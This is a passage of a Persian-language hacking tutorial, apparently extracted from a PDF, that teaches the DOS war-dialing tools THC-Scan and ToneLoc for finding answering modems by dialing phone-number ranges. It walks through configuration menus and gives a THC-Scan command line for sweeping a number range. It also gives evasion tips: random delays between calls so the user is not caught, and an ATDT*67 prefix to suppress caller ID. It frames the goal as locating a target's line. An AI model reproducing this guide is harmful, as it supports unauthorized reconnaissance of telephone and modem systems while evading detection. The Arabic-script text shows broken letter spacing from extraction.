راﻩ زﻣﺎن اﻧﺠ ﺎم و ﻣﺸﺨ ﺼﺎت ﺁن درج ﻣﻴ ﺸﻮد .ای ﻦ اﻃﻼﻋﺎت ﺏﺮای ﺏﺮﺱﯽ هﺎی ﺏﻌﺪی در یﮏ ﻓﺎیﻞ txtذﺧﻴﺮﻩ ﻣﻴﺸﻮد در ﭘﻮﺷﻪ ﺏﺮﻧﺎﻣﻪ . ویﮋﮔﻴﻬﺎی ای ﺏﺮﻧﺎﻣﻪ ﻋﺒﺎرﺕﻨﺪ از : Dial random, Sequential or list of numbers -١یﻌﻨﯽ ایﻨﮑﻪ ایﻦ ﺏﺮﻧﺎﻣﻪ ﻣﻴﺘﻮاﻧﺪ ﺷﻤﺎرﻩ هﺎ را هﻢ ﺏﻪ ﺻﻮرت ﺕﺼﺎدﻓﯽ اﻧﺘﺨﺎب ﮐﻨ ﺪ و ی ﺎ ایﻨﮑﻪ ﺷﻤﺎ ﺁﻧﻬﺎ را در یﮏ ﻓﺎیﻞ ﺏﻪ ﺕﺮﺕﻴﺐ دﻟﺨﻮاﻩ ﺏﻨﻮیﺴﻴﺪ و ﺏﺪیﺪ دﺱﺖ ﻧﺮم اﻓﺰار و یﺎ ﭘﺸﺖ ﺱﺮ هﻢ زﻧﮓ ﺏﺰﻧﺪ !! Nudging -٢ﺏ ﺴﻴﺎر ﻋ ﺎﻟﯽ اﺱ ﺖ ﺡ ﺎﻻ یﻌﻨ ﯽ ﭼ ﯽ یﻌﻨ ﯽ ایﻨﮑ ﻪ ای ﻦ ﺡ ﻀﺮت ﺕﻌ ﺎﻟﯽ ﻣﻴﺘﻮاﻧ ﺪ ﺏﻌ ﺪ از ﮐ ﺸﻒ ﻣ ﻮدم ﻓﻌ ﺎل و ﺏ ﺪرد ﺏﺨ ﻮر ی ﮏ ﺱ ﺮی ﮐﺎراﮐﺘﺮ هﺎی از ﻗﺒﻞ ﻣﺸﺨﺺ را ﺏﺮای ﻣﻮدم ﻗﺮﺏﺎﻧﯽ ﻣﻴﻔﺮﺱﺘﺪ . ﺧﻮب ﮐﻪ ﭼﯽ ؟ ﺏﺮای ایﻨﮑﻪ ﺏﻔﻬﻤﺪ ﻧﺮم اﻓﺰار ﺱﺮویﺲ دهﻨﺪﻩ ﺟﯽ اﺱﺖ ﺏﺎ ﺕﻮﺟﻪ ﺏﻪ ﺟﻮاب در یﺎﻓﺘﯽ از ﻣﻮدم ﻗﺮﺏﺎﻧﯽ . Random wait between calls -٣ایﻦ یﻌﻨﯽ ایﻨﮑﻪ ﺏﻴﻦ ﺕﻤﺎﺱﻬﺎی ﭘﺸﺖ ﺱﺮ هﻤﯽ ﮐﻪ ﻣﻴﮕﻴﺮد ﺏﻪ ﻃﻮر دﻟﺨﻮاﻩ ﺧﻮدش ﻧ ﻪ ﺷ ﻤﺎ ی ﮏ ﺱ ﺮی وﻗﻔ ﻪ هﺎیﯽ ﺏﻴﻨﺪازد ﺏﻪ ﻃﻮر ﻧﺎﻣﻨﻈﻢ ﺕﺎ ﺷﻤﺎ ﻟﻮ ﻧﺮویﺪ ﺏﻪ ﻋﻠﺖ ایﻦ هﻤﻪ ﺕﻤﺎس !! Break up Work -۴اﮔﺮ ﺷﻤﺎ یﮏ ﺷﺒﮑﻪ داﺧﻠﯽ و ﭼﻨﺪ ﻣﻮدم و ﭼﻨﺪ ﺧﻂ ﺕﻠﻔﻦ داریﺪ ﺏﺎ اﺱﺘﻔﺎدﻩ اﻣﮑﺎﻧ ﺎت ای ﻦ ﺏﺮﻧﺎﻣ ﻪ ﮐ ﺎر را روی ه ﺮ ﮐ ﺎﻣﭙﻴﻮﺕﺮ ﺕﻘﺴﻴﻢ ﻣﻴﮑﻨﻴﻢ ﺕﺎ زود ﺕﺮ ﺏﻪ ﻧﺘﻴﺠﻪ ﺏﺮﺱﻴﻢ. دیﮕﺮ ویﮋﮔﻴﻬﺎی ایﻦ ﺏﺮﻧﺎﻣﻪ ای ﻦ اﺱ ﺖ ﮐ ﻪ اﮔ ﺮ ﺷ ﻤﺎرﻩ ای وﺱ ﻂ ﮐ ﺎر اﺷ ﻐﺎل ﺏ ﻮد ﺁن را ﮐﻨ ﺎر ﻣ ﯽ ﮔ ﺰارد و ﺏﻌ ﺪا ﻣ ﺪت زﻣ ﺎﻧﯽ دوﺏ ﺎرﻩ ﺁن ﺷ ﻤﺎرﻩ را ﻣﻴﮕﻴﺮد. اﮔﺮ ﮐﺴﯽ ﺁن ﻃﺮف ﺧﻂ ﮔﻮﺷﯽ را ﺏﺮدارد و هﯽ اﻟﻮ اﻟﻮ و ..ﮐﻨﺪ ایﻦ ﺷﻤﺎرﻩ هﻢ ﮐﻨﺎر ﻣﻴﮕﺰارد و ﺏﻌﺪا ﺏﻪ اون دوﺏﺎرﻩ زﻧﮓ ﻣﻴﺰﻧﺪ. اﮔﺮ ﺏﻠﻨﺪﮔﻮ ﻣﻮدم ﻓﻌﺎل ﺏﺎﺷﺪ و ﺷﻤﺎ ﺻﺪای ﻃﺮف را در هﻨﮕﺎم اﻟﻮ اﻟﻮ ﮐﺮدن ﺏﺸﻨﻮیﺪ ﻣﻴﺘﻮاﻧﻴﺪ ﺏﺎ ﻓﺸﺎر دﮐﻤﻪ Bﺻﻔﺤﻪ ﮐﻠﻴ ﺪ ارﺕﺒ ﺎط را ﻗﻄ ﻊ ﮐﻨﻴ ﺪ و ی ﺎ اﮔﺮ ﺻﺪای ﻣﻮدم را ﻣﻴﺸﻨﻮیﺪ ﺏﺎ ﻓﺸﺎر دﮐﻤﻪ Cﺁن ﺷﻤﺎرﻩ را ﺏﺮای ﺷﻤﺎ ﺙﺒﺖ ﮐﻨﺪ و... یﮏ ﮐﻢ ریﺰ ﺕﺮ ﺕﻮﺽﻴﺢ ﻣﻴﺪهﻢ اول ایﻦ ﻧﺮم اﻓﺰار ﺏﺎﻻ ﺷﮑﻞ ﭘﻴﺶ رﻓﺘﻪ ﻧﺮم اﻓﺰار Tone locاﺱﺖ ﮐﻪ اون هﻢ ﺕﻮﺽﻴﺢ ﻣﻴﺪهﻢ . ایﻦ دوﺕﺎ ﺧﻴﻠﯽ ﺱﺮ راﺱﺖ ﻧﺼﺐ ﻣﻴﺸﻮﻧﺪ و ﻓﻘﻂ ﺷﻤﺎ ﺏﺎیﺪ ﻓﺎیﻞ اﺟﺮایﯽ ﺁن را ﮐﭙﯽ ﮐﻨﻴﺪ ﺏﻌﺪ اﺟﺮا ﮐﻨﻴﺪ !! اﮔﺮ ﻓﺎیﻞ ts-cfgرا اﺟ ﺮا ﮐﻨﻴ ﺪ ﻣ ﯽ ﺕﻮاﻧﻴ ﺪ ﭘﻴﮑﺮ ﺏﻨﺪی ﺁن را دﺱﺖ ﮐﺎری ﮐﻨﻴﺪ ﺕﻮﺻﻴﻪ ﻣﻴﺸﻮد ﮐﺪ ﻣﻨﻄﻘﻪ ﺧﻮد را ﺡﺘﻤﺎ وارد ﮐﻨﻴﺪ ﻣﺜﻼ ﺕﻬﺮاﻧﯽ هﺎ ٠٢١و ﮐﺮﺟﯽ هﺎ ٠٢۶١و ...ﭼﻮن ﻣ ﻮﻗﻌﯽ ﮐ ﻪ در ﺧﻂ ﻓﺮﻣﺎن ﻣﻴﺨﻮاهﻴﻢ ﺷﻤﺎرﻩ ﮔﻴﺮی ﮐﻨﻴﻢ ﻣﺸﮑﻠﯽ ﭘﻴﺶ ﻧﻴﺎیﺪ !!ﺷﮑﻞ ﻇﺎهﺮی ایﻦ ﺏﻪ ایﻦ ﺻﻮرت اﺱﺖ:
ﮐﻪ ﭘﺲ از زدن ﮔﺰیﻨﻪ ) Modem Configﭘﻴﮑﺮ ﺏﻨﺪی ﻣﻮدم ( ﺏﻪ ایﻦ ﺷﮑﻞ ﻣﻴﺸﻮد :
آﻣﻮزش ﻫﮏ و ﻣﻌﺮﻓﯽ ﻧﺮم اﻓﺰار ﻫﺎی ﻣﺮﺑﻮﻃﻪ ﺗﻮﺳﻂ ﺧﻮدم !!
ﺻﻔﺤﻪ
٨
اﻟﺒﺘﻪ زیﺎد ﺷﻤﺎ در ایﻦ ﻗﺴﻤﺖ دﺱﺖ ﮐﺎری ﻧﮑﻨﻴ ﺪ وﻟ ﯽ ﻓﻘ ﻂ ﭘ ﻮرت را ی ﮏ ﻧﮕ ﺎﻩ ﺏﻨﺪازی ﺪ ﺏﺒﻴﻨﻴ ﺪ درﺱ ﺖ ی ﺎ ﻧ ﻪ اﮔ ﺮ ﻧﻤ ﯽ داﻧﻴ ﺪ ﺟﻠ ﻮی IRQﭼ ﯽ ﺏﺎی ﺪ ﺏﻨﻮیﺴﻴﺪ ﻧﺮم اﻓﺰار ﮐﻤﮑﯽ ﺁن را ﺏﺎ ﻧﺎم MOD-DET.EXEاﺟﺮا ﮐﻨﻴﺪ ﺏﻌﺪ ﻣﻴﻔﻬﻤﻴﺪ وﻟﯽ ﺷﮑﻞ ﮐﻠﯽ ﺏﻪ ﺻﻮرت زیﺮ اﺱﺖ: COM IRQ I/P Port 1 4 3f8 2 3 2f8 3 4 3e8 4 3 2e8 اﮔﺮ ﻣﯽ ﺧﻮاهﻴﺪ ﺟﺰﺋﻴﺎت ﺏﻴﺸﺘﺮی را ﺕﻨﻈﻴﻢ ﮐﻨﻴﺪ ﻣﺜﻞ ﺕﺎیﻢ اوت ﺏﺮای ﻓﺮاﺧﻮاﻧﯽ )ﭼﻘﺪر زﻣ ﺎن ﺏ ﺮای ه ﺮ ﺷ ﻤﺎرﻩ ﺻ ﺮف ﺷ ﻮد( ،ﺷ ﻤﺎرﻩ ﮔﻴ ﺮی ﻣﺠ ﺪد ﺷﻤﺎرﻩ هﺎی اﺷﻐﺎل اﻧﺠﺎم ﺏﺸﻮد یﺎ ﻧﻪ ،ﺕﺼﺎدﻓﯽ ﺷﻤﺎرﻩ ﺏﮕﻴﺮد یﺎ ﻧﻪ و ...ﺏﻪ ﻣﻨﻮی Scanning Optionsﺏﺮویﺪ ﮐﻪ ایﻦ ﺷﮑﻠﯽ:
ﻣﻦ ﻧﻤﯽ ﺧﻮاهﻢ ریﺰ ﺟﺰﺋﻴﺎت ﺏﺎ ایﻦ یﺎدﺕﻮن ﺏﺪم ) ﭼﻮن ﺧﻴﻠﯽ ﺧﻴﻠﯽ ﺕﺎﺏﻠﻮ( ﺧﻮدﺕﻮن یﮏ ﻧﻴﻢ روز ﺱﺮف ﺁن ﮐﻨﻴﺪ ﻣﻴﻔﻬﻤﻴ ﺪ ه ﻴﭻ ﮐ ﺎری ﻧ ﺪارد .در ﺁﺧ ﺮ ﻓﺎیﻞ ﭘﻴﮑﺮ ﺏﻨﺪی را ذﺧﻴﺮﻩ ﮐﻨﻴﺪ و ﺧﺎرج ﺷﻮیﺪ. ﺏﻌﺪ از ﭘﻴﮑﺮ ﺏﻨﺪی ﮐﻪ ﻣﻄﺎﻟﺐ ﻣﻬﻢ ﺁن را یﺎدﺕﻮن دام ﻣﻮﻗﻊ اﺟﺮا ﻧﺮم اﻓﺰار ،ﻓﺮا ﻣﻴﺮﺱﺪ ﺏﺎیﺪ ﺷﻤﺎ در ﺧﻂ ﻓﺮﻣﺎن ﺏﻨﻮیﺴﻴﺪ: ]Microsoft Windows XP [Version 5.1.2600 (C) Copyright 1985-2001 Microsoft Corp. D:\zornaznfarsinvashtam>Thc-scan filename.dat/m:123.xxxx/r:1000.9999
آﻣﻮزش ﻫﮏ و ﻣﻌﺮﻓﯽ ﻧﺮم اﻓﺰار ﻫﺎی ﻣﺮﺑﻮﻃﻪ ﺗﻮﺳﻂ ﺧﻮدم !!
ﺻﻔﺤﻪ
٩
ﺏﺎز هﻢ یﮏ ﺕﻮﺽﻴﺢ ﮐﻮﭼﻮﻟﻮ در ﺏﺎرﻩ ایﻦ دﺱﺘﻮر ﻣﻴ ﺪهﻢ .ﮔﺰیﻨ ﻪ /Mﻧﻤﺎی ﺎﻧﮕﺮ ﭘﻴ ﺸﻮﻧﺪ و داﻣﻨ ﻪ ﺷ ﻤﺎرﻩ ﺕﻠﻔ ﻦ ه ﺎ اﺱ ﺖ ﮐ ﻪ ﺏﺎی ﺪ ﺷ ﻤﺎرﻩ ﮔﻴ ﺮی ﺷ ﻮﻧﺪ .ﮔﺰیﻨﻪ /Rیﺎ Rangeارﻗﺎﻣﯽ را ﻣﺸﺨﺺ ﻣﻴﮑﻨﺪ ﮐﻪ در ﻧﻘﺎط ﻣ ﺸﺨﺺ ﺏ ﺎ Xدر ﻓﺮﻣ ﺎن ﻣﻴﺒﺎﺷ ﺪ.ﺧ ﻮدم ه ﻢ ﻧﻔﻬﻤﻴ ﺪم ﭼ ﯽ ﮔﻔ ﺘﻢ ﺏ ﻪ ﻋﺒ ﺎرت دیﮕ ﺮ ، ﻓﺮﻣﺎن ﺏﺎﻻ ﮐﻠﻴﻪ ارﻗﺎم ﺏﻴﻦ ١٢٣-١٠٠٠و ١٢٣-٩٩٩٩را ﺷﻤﺎرﻩ ﮔﻴﺮی ﻣﻴﮑﻨﺪ ٣ /M ).ﺕﺎ ۶رﻗﻢ ﻣﺸﺨﺺ ﻣﯽ ﮐﻨﺪ(. ﮔﺰیﻨﻪ Filename.datهﻢ هﻤﺎن ﻧﺎم ﻓﺎیﻞ ﺕﻨﻈﻴﻤﻬﺎ ی ﺷﻤﺎ اﺱﺖ ﮐﻪ ﺏﺎﻻ درﺱﺖ ﮐﺮدیﺪ.هﻤﻴﻦ!! اﺡﺘﻤﺎﻻ یﻌﻨﯽ %١٠٠ﻗﺒﻞ از ایﻦ ﻧﺮم اﻓﺰار ﺏﺎﻻیﯽ Tone locهﻢ ﮐﺎرﻩ ﺏﻮدﻩ !! اﻟﺒﺘﻪ ایﻦ ﺏﺎﺏﺎی ﺏﻼیﯽ اﺱﺖ ﻣﻦ ﺕﻮﺻﻴﻪ ﻧﻤﻴﮑﻨﻢ از ای ﻦ اﺱ ﺘﻔﺎدﻩ ﮐﻨﻴ ﺪ وﻟﯽ ﺏﺎز ﻃﺮﻓﺪار ﺧﻮدش را دارد ﺷ ﺎیﺪ ﺷ ﻤﺎ ه ﻢ از ﻃﺮﻓ ﺪارهﺎی ﺁن ﺷ ﺪیﺪ .وﻟ ﯽ ﺧﻴﻠ ﯽ ﻗ ﻮی وﻟ ﯽ دﻧ ﮓ ﻓ ﻦ ﮔ ﺶ ﺧﻴﻠ ﯽ زی ﺎد.ﻣ ﻦ ای ﻦ ﺏ ﻪ ﻋﻠ ﺖ ﮐﻤ ﯽ ﭘﻴﭽﻴﺪﮔﯽ ﺁن ﺏﻴﺸﺘﺮ ﺕﻮﺽﻴﺢ ﻣﻴﺪهﻢ !! ایﻦ اﺏﺰار هﻤﻴﻨﻄﻮر ﮐﻪ ﻣﻴﺪاﻧﻴﺪ ﺏﺮﻧﺎﻣﻪ ﺷﻤﺎرﻩ ﮔﻴﺮ ﺕﺤﺖ DOSاﺱﺖ ﮐﻪ اﻣﮑﺎن ﺷﻤﺎرﻩ ﮔﻴﺮی ﺧﻮدﮐﺎر و ﻣﺪیﺮیﺖ ﺏﻴﺶ از ١٠٠٠٠ ﺷﻤﺎرﻩ را دارد ﺕﻤﺎم ﻗﺎﺏﻠﻴﺖ هﺎی THC Scanرا دارا ﻣﻴﺒﺎﺷ ﺪ اﻟﺒﺘ ﻪ ﺏﻐﻴ ﺮ از User Friendlyﺏ ﻮدن را !! اﻟﺒﺘ ﻪ دارای ی ﮏ راﺏ ﻂ ﮐ ﺎرﺏﺮ ﮐ ﻪ از ﮐﺎراﮐﺘﺮ هﺎی ASC 2اﺱﺘﻔﺎدﻩ ﻣﯽ ﮐﻨﺪ هﺴﺖ ﮐﻪ ﮐﺎر را ﺱﺎدﻩ ﮐﺮدﻩ اﺱﺖ اﻟﺒﺘﻪ ﺏﺎ ﺱﻮیﭻ هﺎ در ﺧﻂ ﻓﺮﻣﺎن ﮐﺎر ﺁﻧﺮا ﻣﻴﺸﻮد ﮐﺮد .ﻗﺒ ﻞ از اﺱ ﺘﻔﺎدﻩ از ایﻦ ﺏﺮﻧﺎﻣﻪ ﺏﺎیﺪ ایﻦ را ﻣﺜﻞ ﻧﺮم اﻓﺰار ﻗﺒﻠﯽ ﭘﻴﮑﺮ ﺏﻨﺪی ﮐﻨﻴﺪ ﺏﺮای ایﻦ ﮐﺎر ﻓﺎی ﻞ Tlcfg.exeرا اﺟ ﺮا ﮐﻨﻴ ﺪ ای ﻦ ﺏﮕ ﻢ ﮐ ﻪ دﮐﻤ ﻪ Enterروی ﮐﻴﺒ ﻮرد ﮐﺎر ﺏﺎز ﮐﺮدن ﻣﻨﻮ هﺎ را دارد و Escﺏﺎﻋﺚ ﺏﺴﺘﻪ ﺷﺪن ﺁن ﻣﻴﺸﻮد ﺏﺎ ﮐﻠﻴﺪ هﺎی ﺟﻬﺘﯽ ﻣﻴﺘﻮاﻧﻴﺪ ﺕﻮ ﻣﻨﻮ هﺎ ﺡﺮﮐﺖ ﮐﻨﻴﺪ !! ﻣﻨﻮی : Files
ﺏﺎ اﺱﺘﻔﺎدﻩ از ﻣﻨﻮی ﻓﺎیﻞ ﺷﻤﺎ ﻣﻴﺘﻮاﻧﻴﺪ اﺱﺎﻣﯽ ﻣﻮرد ﻧﻈﺮﺕﺎن ﺏﺮای ﻓﺎیﻠﻬﺎیﯽ ﻣﺜﻞ Found ، LOGو ﻏﻴﺮﻩ را ﺕﻐﻴﻴﺮ ﺏﺪهﻴﺪ .ایﻦ ﻓﺎیﻠﻬﺎ ﻧﺘﺎیﺠﯽ ﻣﺜﻞ ﺕﻠﻔﻦ ﻣﺸﻐﻮل ﺏﻮد و ﺟﻮاب ﻧﺪاد و یﮏ ﻣﻮدم ﭘﻴﺪا ﮐﺮدم و ....را دارا ﻣﻴﺒﺎﺷﻨﺪ !! ) ﺕﻮﺻﻴﻪ ﻣﻴﮑﻨﻢ دﺱﺖ ﻧﺰﻧﻴﺪ " هﺎ ﻟﻮ " ﮔﻴﺞ ﻣﻴ ﺸﻮد ﺁﺧ ﺮش هﻨﮕﻴ ﺎت ﻣﻴﮑﻨﺪ(.ﻓﺎیﻞ Black listﺷﻤﺎرﻩ هﺎیﯽ ﮐﻪ هﺮﮔﺰ ﻧﺒﺎیﺪ ﺏﮕﻴﺮد ﻣﺜﻞ اورژاﻧﺲ ،ﺁﺕﺶ ﻧﺸﺎﻧﯽ ،ﭘﻠﻴﺲ و ...اﺱﺖ. Alt Screenهﻢ ﺡﺎوی راهﻨﻤﺎیﯽ هﺎی ﻧﺎ ﻣﺮﺏﻮﻃﻪ اﺱﺖ .ﻻزم ﺏﻪ ذﮐﺮ اﺱﺖ در ﻧﺎم ﮔﺰاری ﻓﺎیﻞ هﺎ ﻗﺎﻋ ﺪﻩ ﻋﻬ ﺪ ﺏ ﻮق DOS ٨٫٣را ﺡﺘﻤ ﺎ رﻋﺎی ﺖ ﮐﻨﻴﺪ یﻌﻨﯽ ٨ﮐﺎراﮐﺘﺮ ﺏﺮای ﻧﺎم و ٣ﮐﺎراﮐﺘﺮ ﺏﺮای ﭘﺴﻮﻧﺪ ﻓﺎیﻞ !! ﻣﻨﻮی : Modem Strings
ﺏﺎ اﺱﺘﻔﺎدﻩ از ایﻦ ﻣﻨﻮ ﻣﻴﺘﻮاﻧﻴﺪ دﺱﺘﻮرات اﺱﺘﺎﻧﺪارد ﻣﻮدم هﺎی Hayesیﺎ ﺏﻪ ﻋﺒﺎرت ﺱﺎدﻩ ﺕﺮ دﺱﺘﻮرات ATرا ﺏﺮای ﭘﻴﮑﺮ ﺏﻨﺪی ﻣﻮدم اﺱﺘﻔﺎدﻩ ﮐﻨﻴ ﺪ ﻣﺜﻼ ﭘﻴﺸﻮﻧﺪ ﺷﻤﺎرﻩ ﮔﻴﺮی را از ATDTﺏﻪ ATDT*67ﻋﻮض ﮐﻨﻴﺪ ﺕ ﺎ Caller IDاز ﮐ ﺎر ﺏﻴﻔﺘ ﺪ ﻣﻴﺘﻮاﻧﻴ ﺪ ﭘﻴ ﺸﻮﻧﺪ ه ﺎی دیﮕ ﺮی را ه ﻢ اﺱ ﺘﻔﺎدﻩ ﮐﻨﻴﺪ ﻣﺜﻞ ATDT9,1907یﻌﻨﯽ ایﻨﮑﻪ اﺏﺘﺪا ﺷﻤﺎرﻩ ٩را ﺏﺮای دﺱﺖ رﺱﯽ ﺏﻪ ﺧ ﻂ ﺕﻠﻔ ﻦ ﻣﻴﮕﻴ ﺮد و ﺱ ﭙﺲ ﮐ ﺪ درﺧﻮاﺱ ﺖ ﺷ ﻤﺎرﻩ ﮔﻴ ﺮی از راﻩ دور
آﻣﻮزش ﻫﮏ و ﻣﻌﺮﻓﯽ ﻧﺮم اﻓﺰار ﻫﺎی ﻣﺮﺑﻮﻃﻪ ﺗﻮﺳﻂ ﺧﻮدم !!
ﺻﻔﺤﻪ
١٠
١٠٩٧ﮐﻪ ایﻦ ﺏﻪ درد ادارات ﻣﻴﺨﻮرد .ﻣﻴﮕﻢ از ﮐﺠﺎ ﺏﻘﻴﻪ ایﻦ دﺱﺘﻮرهﺎ را ﭘﻴﺪا ﮐﻨﻴﺪ.اﮔﺮ ﺏﻪ هﺮ دﻟﻴﻠﯽ هﻨﮕﻴﺎت ﮐﺮد روی ﮔﺰیﻨﻪ Stringو Tone Hangupﻣﺮﺏﻮط ﺏﻪ ﻣﻮدم ﺧﻮدﺕﻮن ﮐﻠﻴﺪ ﮐﻨﻴﺪ . ﻓﺮاﻣﻴﻦ ATرا از ﺁدرس زیﺮ ﻣﻴﺘﻮاﻧﻴﺪ ﭘﻴﺪا ﮐﻨﻴﺪ: http://www.modemhelp.net/basicatcommand.shtml ﻣﻨﻮی : Modem Options
ﺏﺎ ﺏﻬﺮﻩ ﮔﻴﺮی از اﻣﮑﺎﻧﺎت ایﻦ ﻣﻨﻮ ﻣﻴﺘﻮاﻧﻴﺪ ﺕﻨﻈﻴﻤﺎت ﺱﺨﺖ اﻓﺰاری ﻣﻮدم را اﻧﮕﻮﻟﮏ ﮐﻨﻴﺪ .اﮔﺮ از ایﻦ ﺟ ﺎ ﭼﻴ ﺰی ﺱ ﺮ در ﻧﻴ ﺎوردﻩ ای ﺪ ه ﻴﭻ ﻧﮕ ﺮان ﻧﺒﺎﺷﻴﺪ ﻓﻘﻂ ﻻزم ﭘﻮرت COMرا ﺕﻌﻴﻴﻦ ﮐﻨﻴﺪ ﮐ ﻪ ﺁن را از ﮐﻨﺘ ﺮل ﭘﺎﻧ ﻞ ویﻨ ﺪوز ﻗ ﺴﻤﺖ ﻣ ﻮدم ﺕ ﺸﺨﻴﺺ ﺏﺪهﻴ ﺪ ﮐ ﻪ ﻣﻌﻤ ﻮﻻ COM 3اﺱ ﺖ ﺏ ﺮای ﻣﻮدم هﺎی داﺧﻞ ﮐﻴﺲ .یﮏ ﻣﺸﮑﻞ اﺱﺎس ایﻦ ﺏﺮﻧﺎﻣﻪ ﻋﺪم ﭘﺸﺘﻴﺒﺎﻧﯽ از ﭼﻨﺪ ﻣﻮدم و ﭼﻨﺪ ﺧﻂ ﺕﻠﻔﻦ اﺱ ﺖ ﮐ ﻪ ﻣﻌﻤ ﻮﻻ ﺏﺎی ﺪ ﺏ ﺮای ﺏﺮﻃ ﺮف ﮐ ﺮدن ای ﻦ ﻋﻴﺐ از ﭼﻨﺪ ﺏﺎر اﺟﺮای هﻤﻴﻦ ﺏﺮﻧﺎﻣﻪ ﺏﻪ ﺻﻮرﺕﯽ ﮐﻪ ﺏﺮای هﺮ ﺏﺮﻧﺎﻣﻪ ﭘﻮرت COMﻣﺠﺰایﯽ ﺕﻌﺮیﻒ ﮐﺮد ﭘﻮﺷﺶ دادﻩ ﺷﻮد. یﮏ ﺱﻮال ﺧﻮب ایﻦ اﺱﺖ ﮐﻪ Baud rateﭼﻴﺴﺖ ؟ در ﺟﻮاب ﺏﺎی ﺪ ﮔﻔ ﺖ ای ﻦ ﻓﻘ ﻂ ﺱ ﺮﻋﺖ ﺏﺮﻗ ﺮاری ارﺕﺒ ﺎط ﻣ ﻮدم اﺱ ﺖ و ه ﻴﭻ ﺕ ﺎﺙﻴﺮی ﺏ ﺮ روﻧ ﺪ ﺱﺮیﻊ ﺷﺪن اﺕﺼﺎل ﻣﻮدم ﺏﺎ ﻣﻮدم هﺎ را ﻧﺪارد. ﻣﻨﻮی : Scan Options
ایﻦ ﻣﻨﻮ اﺱﺎس ﮐﺎر ﻣﺎ اﺱﺖ و ﺏﺎیﺪ ﺏﻪ ﺻﻮرت ویﮋﻩ ﻣﻮرد ﺏﺮﺱﯽ ﻗﺮار ﺏﮕﻴﺮد. ﺷﺎیﺪ ﻧﻴﺎز ﺏﺎﺷﺪ ﺏﺎ ایﻦ دو ﮔﺰیﻨﻪ یﮏ ﮐﻤﯽ ﺏﺎزی ﮐﻨﻴﺪ ﺕﺎ ﻣﻘﺪار ﺏﻬﺘﺮیﻦ را ﺏﺮای وﺽﻌﻴﺖ ﺧﻮد ﭘﻴﺪا ﮐﻨﻴﺪ . 1-Wait Delay 2-Between-Call Delay ﻣﻘﺪار ﮔﺰیﻨﻪ دوﻣﯽ و اﺻﻼ هﺮ دو ﺏﺮ ﺡﺴﺐ ﻣﻴﻠﯽ ﺙﺎﻧﻴﻪ اﺱﺖ ﮐﻪ دوﻣﯽ زﻣﺎن ﺏﺮای ریﺴﺖ ﮐﺮدن ﻣﻮدم ﺏﺮای ﺷﻤﺎرﻩ ﮔﻴ ﺮی ﻣﺠ ﺪد اﺱ ﺖ ﮐ ﻪ ﺏ ﺴﺘﮕﯽ ﺏﻪ ﻣﻮدم ﺧﻂ و ﺷﻤﺎرﻩ هﺎیﯽ ﮐﻪ دارد ﻣﻴﮕﻴﺮد دارد زﻣﺎن ﺏﻴﺸﺘﺮ ﺏﺎﻋﺚ ریﺴﺖ ﺷﺪن ﺏﻬﺘﺮ ﻣﻮدم ﺕﻮﺱﻂ ﻧﺮم اﻓﺰار ﻣﻴﺸﻮد ﻣﺜﻼ ۴٠٠ی ﺎ ﺡ ﺪاﮐﺜﺮ، ۵ ٠٠ ﭘﻴﺶ ﻓﺮض ایﻦ زﻣﺎن ٣٠٠ﻣﻴﻠﯽ ﺙﺎﻧﻴﻪ اﺱﺖ ﮐﻪ ﺧﻮب اﺱﺖ .ﮔﺰیﻨﻪ اول Wait Delayدارای اهﻤﻴﺖ ویﮋﻩ ایﯽ اﺱﺖ ایﻦ ﮔﺰیﻨﻪ ﻣﻌﺮف ﻣﺪت زﻣ ﺎﻧﯽ اﺱﺖ ﻧﺮم اﻓﺰار ﻣﻨﺘﻈﺮ دریﺎﻓﺖ ﭘﺎﺱﺦ ﻣﯽ ﻣﺎﻧﺪ .ﭘﺲ از ایﻦ رو ﻣﯽ ﺕﻮان ﺏﺎ ﺕﻮﺟﻪ ﺏﻪ ﺕﻌﺪاد ﺷﻤﺎرﻩ هﺎی ﺕﻠﻔﻦ و ایﻦ زﻣﺎن} ﻣﻨﻈ ﻮر، { Wait Delay ) از ،زﻣﺎن Between-Call Delayﺏﻪ ﻋﻠﺖ ﮐﻮﭼﮑﯽ ﻣﯽ ﺕﻮان ﺻﺮف ﻧﻈﺮ ﮐ ﺮد ( ﻣ ﺪت زﻣ ﺎن ﮐ ﺎر را ﺕﺨﻤ ﻴﻦ زد ﻣ ﺜﻼ زﻣ ﺎن Wait Delay
آﻣﻮزش ﻫﮏ و ﻣﻌﺮﻓﯽ ﻧﺮم اﻓﺰار ﻫﺎی ﻣﺮﺑﻮﻃﻪ ﺗﻮﺳﻂ ﺧﻮدم !!
ﺻﻔﺤﻪ
١١
در ﺡﺎﻟﺖ ﭘﻴﺶ ﻓﺮض ۴۵٠٠٠ﻣﻌﺎدل ۴۵ﺙﺎﻧﻴﻪ ﻣﯽ ﺏﺎﺷﺪ ﭘﺎس ﺏﺎ یﮏ ﻣﺤﺎﺱﺒﻪ ﺱﺨﺖ ریﺎﺽﯽ ﻣﯽ ﺕﻮان ﻓﻬﻤﻴﺪ ﮐ ﻪ اﮔ ﺮ ﻣ ﺎ ﺏﺨ ﻮاهﻴﻢ ١٠٠٠ﺷ ﻤﺎرﻩ را ﺕﺴﺖ ﮐﻨﻴﻢ ﻧﻴﺎز ﺏﻪ یﮏ ١۶ﺱﺎﻋﺘﯽ زﻣﺎن اﺡﺘﻴﺎج داریﻢ!! اﻟﺒﺘﻪ ﻣﻴﺘﻮان یﮏ ﺷﺐ ﺕﺎ ﺻﺒﺢ ﻓﺮض ﮐﺮد ﮐﻪ هﻢ ﭘﻮل ﮐﻤﺘﺮی ﺁب ﺏﺨﻮرد هﻢ ﮐﺴﯽ ﻣﺰاﺡﻢ ﻧﺸﻮد.وﻟﯽ ﺏﻬﺘﺮ اﺱﺖ ایﻦ ﻋﺪد را ﺏﻪ ٣۵٠٠٠ویﺎ٣٠٠٠٠ ﻣﻴﻠﯽ ﺙﺎﻧﻴﻪ ﮐﺎهﺶ داد ﮐﻪ ﻣﻨﻄﻘﯽ ﺕﺮ هﻢ اﺱﺖ ).ﭼﻮن ﻣ ﺎ داری ﻢ دﻧﺒ ﺎل ﺧ ﻂ ﺁﻗ ﺎی ﺡ ﻀﺮت ﻣ ﺪیﺮ ﻣﻴﮕ ﺮدیﻢ !!( اﻟﺒﺘ ﻪ ﻣ ﻦ ﺏ ﻪ ﺷﺨ ﺼﻪ ١٠اﻟ ﯽ ١٢ﺙﺎﻧﻴ ﻪ ﺡﺪاﮐﺜﺮ زﻣﺎن ﺏﺮای ایﻦ یﮑﯽ ﻣﻴﮕﺰارم و زﻣﺎن ریﺴﺖ ﻣﻮدم را ﮐﻤﯽ ﺏﻴﺸﺘﺮ ﻣﺜﻼ 